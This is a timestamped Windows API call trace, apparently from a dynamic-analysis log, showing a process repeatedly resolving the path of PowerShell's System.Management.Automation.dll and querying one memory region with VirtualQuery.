	[0284.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.698] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.698] VirtualQuery (in: lpAddress=0x16bc30, lpBuffer=0x16caf0, dwLength=0x30 | out: lpBuffer=0x16caf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.699] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.699] VirtualQuery (in: lpAddress=0x16bc30, lpBuffer=0x16caf0, dwLength=0x30 | out: lpBuffer=0x16caf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.699] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.699] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.699] VirtualQuery (in: lpAddress=0x16bc30, lpBuffer=0x16caf0, dwLength=0x30 | out: lpBuffer=0x16caf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.699] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.699] VirtualQuery (in: lpAddress=0x16bc30, lpBuffer=0x16caf0, dwLength=0x30 | out: lpBuffer=0x16caf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.699] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.700] VirtualQuery (in: lpAddress=0x16bc30, lpBuffer=0x16caf0, dwLength=0x30 | out: lpBuffer=0x16caf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.700] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.700] VirtualQuery (in: lpAddress=0x16b900, lpBuffer=0x16c7c0, dwLength=0x30 | out: lpBuffer=0x16c7c0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.700] VirtualQuery (in: lpAddress=0x16bc30, lpBuffer=0x16caf0, dwLength=0x30 | out: lpBuffer=0x16caf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.700] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.700] VirtualQuery (in: lpAddress=0x16bc30, lpBuffer=0x16caf0, dwLength=0x30 | out: lpBuffer=0x16caf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.700] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.701] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x77e66257, Data2=0x2f64, Data3=0x4739, Data4=([0]=0x81, [1]=0x6f, [2]=0x1c, [3]=0x1f, [4]=0x9b, [5]=0xd, [6]=0x91, [7]=0x3f))) returned 0x0
	[0284.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.702] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x4038713b, Data2=0xa93d, Data3=0x4c2e, Data4=([0]=0x9a, [1]=0x22, [2]=0x55, [3]=0x47, [4]=0x81, [5]=0xe7, [6]=0xfc, [7]=0x1b))) returned 0x0
	[0284.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.720] VirtualQuery (in: lpAddress=0x16b330, lpBuffer=0x16c1f0, dwLength=0x30 | out: lpBuffer=0x16c1f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16be00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16be00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.720] VirtualQuery (in: lpAddress=0x16b330, lpBuffer=0x16c1f0, dwLength=0x30 | out: lpBuffer=0x16c1f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.720] VirtualQuery (in: lpAddress=0x16b3c0, lpBuffer=0x16c280, dwLength=0x30 | out: lpBuffer=0x16c280*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16baf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ba40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ba40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.721] VirtualQuery (in: lpAddress=0x16b330, lpBuffer=0x16c1f0, dwLength=0x30 | out: lpBuffer=0x16c1f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.721] VirtualQuery (in: lpAddress=0x16b3c0, lpBuffer=0x16c280, dwLength=0x30 | out: lpBuffer=0x16c280*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16baf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ba40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ba40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16be00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16be00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.722] VirtualQuery (in: lpAddress=0x16b330, lpBuffer=0x16c1f0, dwLength=0x30 | out: lpBuffer=0x16c1f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.722] VirtualQuery (in: lpAddress=0x16b3c0, lpBuffer=0x16c280, dwLength=0x30 | out: lpBuffer=0x16c280*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16baf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ba40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ba40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.723] VirtualQuery (in: lpAddress=0x16b330, lpBuffer=0x16c1f0, dwLength=0x30 | out: lpBuffer=0x16c1f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.723] VirtualQuery (in: lpAddress=0x16b3c0, lpBuffer=0x16c280, dwLength=0x30 | out: lpBuffer=0x16c280*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16be00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16be00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16be00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
